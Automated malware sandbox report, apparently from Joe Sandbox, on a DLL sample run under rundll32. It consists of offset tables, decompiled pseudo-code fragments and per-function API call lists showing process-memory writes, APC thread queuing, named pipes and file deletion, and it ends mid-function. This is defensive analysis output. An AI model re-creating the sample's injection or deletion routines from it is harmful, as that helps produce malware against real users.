                                                          0x036d1725
                                                          0x036d1720
                                                          0x036d172c
                                                          0x036d1742
                                                          0x036d172e
                                                          0x036d172e
                                                          0x036d173b
                                                          0x036d173b
                                                          0x036d1746
                                                          0x036d1748
                                                          0x036d1752
                                                          0x036d1757
                                                          0x036d1757
                                                          0x036d1752
                                                          0x036d175e
                                                          0x036d1774
                                                          0x036d1760
                                                          0x036d1760
                                                          0x036d176d
                                                          0x036d176d
                                                          0x036d1778
                                                          0x036d177a
                                                          0x036d1784
                                                          0x036d1789
                                                          0x036d1789
                                                          0x036d1784
                                                          0x036d1790
                                                          0x036d17a6
                                                          0x036d1792
                                                          0x036d1792
                                                          0x036d179f
                                                          0x036d179f
                                                          0x036d17aa
                                                          0x036d17ac
                                                          0x036d17b6
                                                          0x036d17bb
                                                          0x036d17bb
                                                          0x036d17b6
                                                          0x036d17c2
                                                          0x036d17d8
                                                          0x036d17c4
                                                          0x036d17c4
                                                          0x036d17d1
                                                          0x036d17d1
                                                          0x036d17dc
                                                          0x036d17ef
                                                          0x036d17ef
                                                          0x00000000
                                                          0x036d17de
                                                          0x036d17de
                                                          0x036d17e8
                                                          0x00000000
                                                          0x036d17f9
                                                          0x036d17f9
                                                          0x036d17fb
                                                          0x036d1811
                                                          0x036d17fd
                                                          0x036d17fd
                                                          0x036d180a
                                                          0x036d180a
                                                          0x036d1815
                                                          0x036d1817
                                                          0x036d181a
                                                          0x036d181b
                                                          0x036d1822
                                                          0x036d1824
                                                          0x036d1825
                                                          0x036d1825
                                                          0x036d1822
                                                          0x036d182c
                                                          0x036d1842
                                                          0x036d182e
                                                          0x036d182e
                                                          0x036d183b
                                                          0x036d183b
                                                          0x036d1846
                                                          0x036d1854
                                                          0x036d185e
                                                          0x036d185e
                                                          0x036d1866
                                                          0x036d187c
                                                          0x036d1868
                                                          0x036d1868
                                                          0x036d1875
                                                          0x036d1875
                                                          0x036d1880
                                                          0x036d1893
                                                          0x036d1893
                                                          0x036d1898
                                                          0x036d189e
                                                          0x00000000
                                                          0x036d1882
                                                          0x036d1885
                                                          0x036d188a
                                                          0x036d1891
                                                          0x036d18a3
                                                          0x036d18a5
                                                          0x036d18bb
                                                          0x036d18a7
                                                          0x036d18a7
                                                          0x036d18b4
                                                          0x036d18b4
                                                          0x036d18bf
                                                          0x036d18cb
                                                          0x036d18d0
                                                          0x036d18d0
                                                          0x036d18c1
                                                          0x036d18c4
                                                          0x036d18c4
                                                          0x036d18de
                                                          0x036d18e3
                                                          0x036d18e9
                                                          0x00000000
                                                          0x036d18ec
                                                          0x00000000
                                                          0x036d1891
                                                          0x036d1880
                                                          0x036d17e8
                                                          0x036d17dc

                                                          APIs
                                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,036DA00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 036D16EA
                                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,036DA00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 036D171C
                                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,036DA00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 036D174E
                                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,036DA00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 036D1780
                                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,036DA00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 036D17B2
                                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,036DA00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 036D17E4
                                                          • HeapFree.KERNEL32(00000000,?,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?,?), ref: 036D18E3
                                                          • HeapFree.KERNEL32(00000000,?,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?,?), ref: 036D18F7
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443349706.00000000036D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                          • Associated: 00000002.00000002.443341044.00000000036D0000.00000004.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443360536.00000000036D9000.00000002.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443368684.00000000036DA000.00000004.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443376893.00000000036DC000.00000002.10000000.00040000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_36d0000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: FreeHeap
                                                          • String ID:
                                                          • API String ID: 3298025750-0
                                                          • Opcode ID: cfc30bdf0306c73dc9946a8ccd4319c6f519b110c6ace7e0ae9053c69cd70619
                                                          • Instruction ID: 831df1c5c2b258ef827b45fbd88a39d2f79bf8ece6c27c58cf7b02584c647bff
                                                          • Opcode Fuzzy Hash: cfc30bdf0306c73dc9946a8ccd4319c6f519b110c6ace7e0ae9053c69cd70619
                                                          • Instruction Fuzzy Hash: 2581C374E05204AFC750EBF5DE88D6FB7EEAB4E60072C0D29E402D760CE6B5DA518764
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 06278669: ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,?,?,?,06272028,?), ref: 0627867A
                                                            • Part of subcall function 06278669: ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,00000000,?,?,?,06272028,?), ref: 06278697
                                                          • FreeLibrary.KERNEL32(?), ref: 062766F8
                                                            • Part of subcall function 0628AFC2: lstrlenW.KERNEL32(?,00000000,?,?,?,0627663D,?,?), ref: 0628AFCF
                                                            • Part of subcall function 0628AFC2: GetCurrentDirectoryW.KERNEL32(00007FFF,00000000,00010012,?,?,?,0627663D,?,?), ref: 0628AFF8
                                                            • Part of subcall function 0628AFC2: lstrcpyW.KERNEL32(-0000FFFE,?), ref: 0628B018
                                                            • Part of subcall function 0628AFC2: lstrcpyW.KERNEL32(-00000002,?), ref: 0628B034
                                                            • Part of subcall function 0628AFC2: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,0627663D,?,?), ref: 0628B040
                                                            • Part of subcall function 0628AFC2: LoadLibraryW.KERNEL32(-0000FFFE,?,?,?,?,0627663D,?,?), ref: 0628B043
                                                            • Part of subcall function 0628AFC2: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,0627663D,?,?), ref: 0628B04F
                                                            • Part of subcall function 0628AFC2: GetProcAddress.KERNEL32(00000000,?), ref: 0628B06C
                                                            • Part of subcall function 0628AFC2: GetProcAddress.KERNEL32(00000000,?), ref: 0628B086
                                                            • Part of subcall function 0628AFC2: GetProcAddress.KERNEL32(00000000,?), ref: 0628B09C
                                                            • Part of subcall function 0628AFC2: GetProcAddress.KERNEL32(00000000,?), ref: 0628B0B2
                                                            • Part of subcall function 0628AFC2: GetProcAddress.KERNEL32(00000000,?), ref: 0628B0C8
                                                            • Part of subcall function 0628AFC2: GetProcAddress.KERNEL32(00000000,?), ref: 0628B0DE
                                                          • FindFirstFileW.KERNEL32(?,?,?,?), ref: 0627664E
                                                          • lstrlenW.KERNEL32(?), ref: 0627666A
                                                          • lstrlenW.KERNEL32(?), ref: 06276682
                                                            • Part of subcall function 06279394: RtlAllocateHeap.NTDLL(00000000,?,06280051), ref: 062793A0
                                                          • lstrcpyW.KERNEL32(00000000,?), ref: 0627669B
                                                          • lstrcpyW.KERNEL32(00000002), ref: 062766B0
                                                            • Part of subcall function 06291C9B: lstrlenW.KERNEL32(?,00000000,76CC8250,76C869A0,?,?,?,062766C0,?,00000000,?), ref: 06291CAB
                                                            • Part of subcall function 06291C9B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000001,00000000,00000000,00000001,?,?,?,062766C0,?,00000000,?), ref: 06291CCD
                                                            • Part of subcall function 06291C9B: lstrcpyW.KERNEL32(00000000,?), ref: 06291CF9
                                                            • Part of subcall function 06291C9B: lstrcatW.KERNEL32(00000000,?), ref: 06291D0C
                                                          • FindNextFileW.KERNEL32(?,00000010), ref: 062766D8
                                                          • FindClose.KERNEL32(00000002), ref: 062766E6
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressProc$lstrcpy$lstrlen$CurrentDirectoryFind$EnvironmentExpandFileLibraryStrings$AllocateByteCharCloseFirstFreeHeapLoadMultiNextWidelstrcat
                                                          • String ID:
                                                          • API String ID: 1209511739-0
                                                          • Opcode ID: ab451505831273b74b80c3976ba04e828aa80c8e966217239b4e1f533f21158f
                                                          • Instruction ID: 6158ab1c0ab93920907564eda6d087d650ac7a2cd9c765290373b7c8de414aed
                                                          • Opcode Fuzzy Hash: ab451505831273b74b80c3976ba04e828aa80c8e966217239b4e1f533f21158f
                                                          • Instruction Fuzzy Hash: 0B414C71914306AFC751EF61EC48E2FBBE9FB84704F040929F994A2150DB34DA18CBA2
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • lstrlenW.KERNEL32(?,00000000), ref: 062799D4
                                                            • Part of subcall function 06279394: RtlAllocateHeap.NTDLL(00000000,?,06280051), ref: 062793A0
                                                          • FindFirstFileW.KERNEL32(?,00000000,?,0000000A,00000208), ref: 06279A3D
                                                          • lstrlenW.KERNEL32(0000002C,?,0000000A,00000208), ref: 06279A65
                                                          • RemoveDirectoryW.KERNEL32(?,?,0000000A,00000208), ref: 06279AB7
                                                          • DeleteFileW.KERNEL32(?,?,0000000A,00000208), ref: 06279AC2
                                                          • FindNextFileW.KERNEL32(?,00000000,?,0000000A,00000208), ref: 06279AD5
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$Findlstrlen$AllocateDeleteDirectoryFirstHeapNextRemove
                                                          • String ID:
                                                          • API String ID: 499515686-0
                                                          • Opcode ID: b1f0b71faa6092ec619070260ed624bccc7880b56ede225243d43f0991017d15
                                                          • Instruction ID: c5f09449c4ebf7a955519cb2132658499428284cbbc9e80778ac62d9ffd7557f
                                                          • Opcode Fuzzy Hash: b1f0b71faa6092ec619070260ed624bccc7880b56ede225243d43f0991017d15
                                                          • Instruction Fuzzy Hash: CB413771D2130AEFDF81EFA5DC88EAE7BB9AF40314F104165E911A6190DB708A80DBA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • memset.NTDLL ref: 0628EAE7
                                                            • Part of subcall function 06287950: NtAllocateVirtualMemory.NTDLL(0628EB0F,00000000,00000000,0628EB0F,00003000,00000040), ref: 06287981
                                                            • Part of subcall function 06287950: RtlNtStatusToDosError.NTDLL(00000000), ref: 06287988
                                                            • Part of subcall function 06287950: SetLastError.KERNEL32(00000000), ref: 0628798F
                                                          • GetLastError.KERNEL32(?,00000318,00000008), ref: 0628EBF7
                                                            • Part of subcall function 062736BB: RtlNtStatusToDosError.NTDLL(00000000), ref: 062736D3
                                                          • memcpy.NTDLL(00000218,062938A0,00000100,?,00010003,?,?,00000318,00000008), ref: 0628EB76
                                                          • RtlNtStatusToDosError.NTDLL(00000000), ref: 0628EBD0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Error$Status$Last$AllocateMemoryVirtualmemcpymemset
                                                          • String ID:
                                                          • API String ID: 2966525677-3916222277
                                                          • Opcode ID: cd9b744c173fa96600ab8dda224b9ed36882d463d37e01d30ba1b7a81f345a13
                                                          • Instruction ID: bf1b92d1baf449cb269e5b0fc16399bd36868592750816111c3c3cbca3a0be6e
                                                          • Opcode Fuzzy Hash: cd9b744c173fa96600ab8dda224b9ed36882d463d37e01d30ba1b7a81f345a13
                                                          • Instruction Fuzzy Hash: EC31837191130AAFDBA0EF64DD89AAAB7B8FF04304F10456AE956E7280D730AA44CB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: memset$memcpy
                                                          • String ID:
                                                          • API String ID: 368790112-0
                                                          • Opcode ID: aaeca94514539444eb8d77539360e9cf57183c2a33d7157cfbc44091fba8e476
                                                          • Instruction ID: 54b31b69d769e7583db1aef47d6c64bc9aed656d266f0fd1da05281349eee4ce
                                                          • Opcode Fuzzy Hash: aaeca94514539444eb8d77539360e9cf57183c2a33d7157cfbc44091fba8e476
                                                          • Instruction Fuzzy Hash: 37F10330911B9ACFDB71DF68C9846AABBF4BF41300F244D6DC9E7866C1D231AA49CB10
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • LoadLibraryA.KERNEL32(?,?,00000000,00000000,0627E23D,00000000,76CDF5B0,06280348,?,00000001), ref: 062786CD
                                                          • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,06279100,?,?,?,?,?), ref: 062786E2
                                                          • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,06279100,?,?,?,?,?), ref: 062786FE
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 06278713
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 06278727
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: LibraryLoad$AddressProc
                                                          • String ID:
                                                          • API String ID: 1469910268-0
                                                          • Opcode ID: 1a82dc00a14ec57e35c505ef5041ede53dad4cc42c1704f2e551cc7a8c0f4c37
                                                          • Instruction ID: a41b00e4ef71f48f719997a4994116d7f7d613df47127884925f1a5bcaaf21b2
                                                          • Opcode Fuzzy Hash: 1a82dc00a14ec57e35c505ef5041ede53dad4cc42c1704f2e551cc7a8c0f4c37
                                                          • Instruction Fuzzy Hash: CA313876A203119FDB45CF58F889E5573EAFB8A360B05406AEA09DB250D778E8428F64
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E036D6D78(intOrPtr _a4) {
                                                          				void* _t2;
                                                          				unsigned int _t4;
                                                          				void* _t5;
                                                          				long _t6;
                                                          				void* _t7;
                                                          				void* _t15;
                                                          
                                                          				_t2 = CreateEventA(0, 1, 0, 0);
                                                          				 *0x36da30c = _t2;
                                                          				if(_t2 == 0) {
                                                          					return GetLastError();
                                                          				}
                                                          				_t4 = GetVersion();
                                                          				if(_t4 != 5) {
                                                          					L4:
                                                          					if(_t15 <= 0) {
                                                          						_t5 = 0x32;
                                                          						return _t5;
                                                          					}
                                                          					L5:
                                                          					 *0x36da2fc = _t4;
                                                          					_t6 = GetCurrentProcessId();
                                                          					 *0x36da2f8 = _t6;
                                                          					 *0x36da304 = _a4;
                                                          					_t7 = OpenProcess(0x10047a, 0, _t6);
                                                          					 *0x36da2f4 = _t7;
                                                          					if(_t7 == 0) {
                                                          						 *0x36da2f4 =  *0x36da2f4 | 0xffffffff;
                                                          					}
                                                          					return 0;
                                                          				}
                                                          				if(_t4 >> 8 > 0) {
                                                          					goto L5;
                                                          				}
                                                          				_t15 = _t4 - _t4;
                                                          				goto L4;
                                                          			}









                                                          0x036d6d80
                                                          0x036d6d86
                                                          0x036d6d8d
                                                          0x00000000
                                                          0x036d6de7
                                                          0x036d6d8f
                                                          0x036d6d97
                                                          0x036d6da4
                                                          0x036d6da4
                                                          0x036d6de4
                                                          0x00000000
                                                          0x036d6de4
                                                          0x036d6da6
                                                          0x036d6da6
                                                          0x036d6dab
                                                          0x036d6dbd
                                                          0x036d6dc2
                                                          0x036d6dc8
                                                          0x036d6dce
                                                          0x036d6dd5
                                                          0x036d6dd7
                                                          0x036d6dd7
                                                          0x00000000
                                                          0x036d6dde
                                                          0x036d6da0
                                                          0x00000000
                                                          0x00000000
                                                          0x036d6da2
                                                          0x00000000

                                                          APIs
                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,036D1D07,?), ref: 036D6D80
                                                          • GetVersion.KERNEL32 ref: 036D6D8F
                                                          • GetCurrentProcessId.KERNEL32 ref: 036D6DAB
                                                          • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 036D6DC8
                                                          • GetLastError.KERNEL32 ref: 036D6DE7
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443349706.00000000036D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                          • Associated: 00000002.00000002.443341044.00000000036D0000.00000004.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443360536.00000000036D9000.00000002.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443368684.00000000036DA000.00000004.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443376893.00000000036DC000.00000002.10000000.00040000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_36d0000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                                                          • String ID:
                                                          • API String ID: 2270775618-0
                                                          • Opcode ID: baa5c38a166feee05ea7ee0b45a29c69ad7a0b80efc394e1685b568a66c5c8f6
                                                          • Instruction ID: cf14e5f2940f2570bbb84f6eb33358c522338cc39661fe4866368449adb4854f
                                                          • Opcode Fuzzy Hash: baa5c38a166feee05ea7ee0b45a29c69ad7a0b80efc394e1685b568a66c5c8f6
                                                          • Instruction Fuzzy Hash: B4F0C270E86302ABDB20FF66FA09F147BA1AB44701F58501DE992D62CCD7758070CF18
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • NtQueryKey.NTDLL(?,00000003,00000000,00000000,?), ref: 0627D7D0
                                                          • lstrlenW.KERNEL32(?), ref: 0627D7DE
                                                          • NtQueryKey.NTDLL(?,00000003,00000000,?,?), ref: 0627D809
                                                          • lstrcpyW.KERNEL32(00000006,00000000), ref: 0627D837
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Query$lstrcpylstrlen
                                                          • String ID:
                                                          • API String ID: 3961825720-0
                                                          • Opcode ID: 88e5e38efb8c28174c382cff53c7eb88cdad143d7a8d369e6867de8768346eb4
                                                          • Instruction ID: 6fb943bf8bea46cd05789c7946e5669b64756934743a766dca4a7f77a455b6a2
                                                          • Opcode Fuzzy Hash: 88e5e38efb8c28174c382cff53c7eb88cdad143d7a8d369e6867de8768346eb4
                                                          • Instruction Fuzzy Hash: A4416D7191020AEFDF519FA8DC84E9EBBB9EF44354F004429FD05A7260D770EA12CB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • CreateNamedPipeA.KERNEL32(40000003,00000004,000000FF,00000100,00000100,00000000,0629A1E8,00000001), ref: 06288215
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,06279100,?,?,?,?,?), ref: 06288260
                                                            • Part of subcall function 062873AA: CreateThread.KERNEL32(00000000,00000000,00000000,0628893A,0629A174,06290998), ref: 062873C1
                                                            • Part of subcall function 062873AA: QueueUserAPC.KERNEL32(0628893A,00000000,?,?,0628893A,?,?,00000000,00000001,00000000,?,00000000,?,?,?), ref: 062873D6
                                                            • Part of subcall function 062873AA: GetLastError.KERNEL32(00000000,?,0628893A,?,?,00000000,00000001,00000000,?,00000000,?,?,?), ref: 062873E1
                                                            • Part of subcall function 062873AA: TerminateThread.KERNEL32(00000000,00000000,?,0628893A,?,?,00000000,00000001,00000000,?,00000000,?,?,?), ref: 062873EB
                                                            • Part of subcall function 062873AA: CloseHandle.KERNEL32(00000000,?,0628893A,?,?,00000000,00000001,00000000,?,00000000,?,?,?), ref: 062873F2
                                                            • Part of subcall function 062873AA: SetLastError.KERNEL32(00000000,?,0628893A,?,?,00000000,00000001,00000000,?,00000000,?,?,?), ref: 062873FB
                                                          • GetLastError.KERNEL32(06281FE9,00000000,00000000,?,?,?,?,?,?,?,06279100,?,?,?,?,?), ref: 06288248
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,06279100,?,?,?,?,?), ref: 06288258
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorLast$CloseCreateHandleThread$NamedPipeQueueTerminateUser
                                                          • String ID:
                                                          • API String ID: 1700061692-0
                                                          • Opcode ID: 2a4285ad39c80a1b935c81c045b54f9a0741484aa6b6dfcc5f7ff84fc4c22257
                                                          • Instruction ID: f2070e8bf2f6ed25fe8234f78acafd0b13f071f8180b687905331e87fc25af7d
                                                          • Opcode Fuzzy Hash: 2a4285ad39c80a1b935c81c045b54f9a0741484aa6b6dfcc5f7ff84fc4c22257
                                                          • Instruction Fuzzy Hash: 35F0A9713163516FE3916AA8AC8DE663759EFCA334B140235FE15D21C0D6A44C15CAB5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • NtQueryInformationThread.NTDLL(?,00000000,?,0000001C,00000000), ref: 0627B7E9
                                                          • GetLastError.KERNEL32(?,?,?,0000001C,?), ref: 0627B829
                                                            • Part of subcall function 06285312: NtWriteVirtualMemory.NTDLL(?,00000004,00000000,00000000,?,76C86780,?,0628907F,?,00000004,00000000,00000004,?), ref: 06285330
                                                          • RtlNtStatusToDosError.NTDLL(00000000), ref: 0627B832
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Error$InformationLastMemoryQueryStatusThreadVirtualWrite
                                                          • String ID:
                                                          • API String ID: 4036914670-0
                                                          • Opcode ID: ceb724ed8f850be4303147a57e9c95c9e8856e48477951d3b0f7792c8fe3b9ff
                                                          • Instruction ID: c0b3eb7ab9d8a109a174f44556613b1ccf145a6b7937791298b834c3424e3dca
                                                          • Opcode Fuzzy Hash: ceb724ed8f850be4303147a57e9c95c9e8856e48477951d3b0f7792c8fe3b9ff
                                                          • Instruction Fuzzy Hash: B001F675A50209FFEB51AEA6EC09DEEBBBEEB88741F100025FE41E2050E775D904DB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • NtQuerySystemInformation.NTDLL(00000005,00000000,00010000,00010000), ref: 0628385A
                                                          • RtlNtStatusToDosError.NTDLL(C000009A), ref: 06283891
                                                            • Part of subcall function 0628E803: RtlFreeHeap.NTDLL(00000000,?,06283953,?,?,0628BF5B,00000000,00000000,062710B0,00000000,06299F2C,00000008,00000003), ref: 0628E80F
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorFreeHeapInformationQueryStatusSystem
                                                          • String ID:
                                                          • API String ID: 2533303245-0
                                                          • Opcode ID: 18bed3406621ec41b7e2bd754a26c780c437445158a829254cba323cc6ee9952
                                                          • Instruction ID: c0d01014357f943ecac93f2f8f9bd7de780ad4b990ff4820b8e377feec1efc4f
                                                          • Opcode Fuzzy Hash: 18bed3406621ec41b7e2bd754a26c780c437445158a829254cba323cc6ee9952
                                                          • Instruction Fuzzy Hash: 7B016236D23225BFD7A2EA959C0CAAEB6699F85F91F164124AD05E3180E7708A01C6E1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • memset.NTDLL ref: 062764E3
                                                          • NtQueryInformationProcess.NTDLL(00000000,00000000,?,00000018,00000000), ref: 062764FB
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: InformationProcessQuerymemset
                                                          • String ID:
                                                          • API String ID: 2040988606-0
                                                          • Opcode ID: 4e2c263c73d431ead2909f39a3bd348c1f40340a75d5b85615aa8ff4af548778
                                                          • Instruction ID: 6fece54f0a9275e4de6ad2064162c1aca914535192550efa2281841eca8d196d
                                                          • Opcode Fuzzy Hash: 4e2c263c73d431ead2909f39a3bd348c1f40340a75d5b85615aa8ff4af548778
                                                          • Instruction Fuzzy Hash: 42F04FB6900229AADB50EA90DC09FDEBBACDB04750F004060AE18E2081E774DA45CBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • RtlNtStatusToDosError.NTDLL(C0000002), ref: 0628524D
                                                          • SetLastError.KERNEL32(00000000,?,0627C670,?,00000000,00000000,00000004,?,00000000,00000000,76C84EE0,00000000), ref: 06285254
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Error$LastStatus
                                                          • String ID:
                                                          • API String ID: 4076355890-0
                                                          • Opcode ID: 76ae33ebb7127395c0218c9bbd736406d4649d6127b844b4ae813a6a0943ea01
                                                          • Instruction ID: cc58c1de3cf3f48d1bca465f2be2147ac7ae97a7a41766f4f60ebb11b5927b68
                                                          • Opcode Fuzzy Hash: 76ae33ebb7127395c0218c9bbd736406d4649d6127b844b4ae813a6a0943ea01
                                                          • Instruction Fuzzy Hash: 63E0123261121AAFDF425EE8AC08D9E7B59EB4C751B008010BF15E2510CB36D421DFB0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • memset.NTDLL ref: 06290327
                                                          • memset.NTDLL ref: 06290336
                                                            • Part of subcall function 06278E0C: memset.NTDLL ref: 06278E1D
                                                            • Part of subcall function 06278E0C: memset.NTDLL ref: 06278E29
                                                            • Part of subcall function 06278E0C: memset.NTDLL ref: 06278E54
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: memset
                                                          • String ID:
                                                          • API String ID: 2221118986-0
                                                          • Opcode ID: 341406b789a4962d08c25e45005e78c00e508755fad212ceb06da4480133e7e8
                                                          • Instruction ID: 796b77a68a21de3ede889d76aa0448ad4ed524ff7a0a04ac14359865db5c2790
                                                          • Opcode Fuzzy Hash: 341406b789a4962d08c25e45005e78c00e508755fad212ceb06da4480133e7e8
                                                          • Instruction Fuzzy Hash: FE022070921B258FCBB5CF29C680567B7F5BF95610B604E2EDAE786A90D231F481CB24
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 49%
                                                          			E036D4BF1(void* __ecx, intOrPtr* _a4) {
                                                          				signed int _v8;
                                                          				signed int _v12;
                                                          				intOrPtr _v16;
                                                          				intOrPtr _v20;
                                                          				intOrPtr _v24;
                                                          				intOrPtr _v28;
                                                          				intOrPtr _v32;
                                                          				intOrPtr _v36;
                                                          				intOrPtr _v40;
                                                          				intOrPtr _v44;
                                                          				intOrPtr _v48;
                                                          				intOrPtr _v52;
                                                          				intOrPtr _v56;
                                                          				intOrPtr _v60;
                                                          				intOrPtr _v64;
                                                          				intOrPtr _v68;
                                                          				intOrPtr _v72;
                                                          				void _v76;
                                                          				intOrPtr* _t226;
                                                          				signed int _t229;
                                                          				signed int _t231;
                                                          				signed int _t233;
                                                          				signed int _t235;
                                                          				signed int _t237;
                                                          				signed int _t239;
                                                          				signed int _t241;
                                                          				signed int _t243;
                                                          				signed int _t245;
                                                          				signed int _t247;
                                                          				signed int _t249;
                                                          				signed int _t251;
                                                          				signed int _t253;
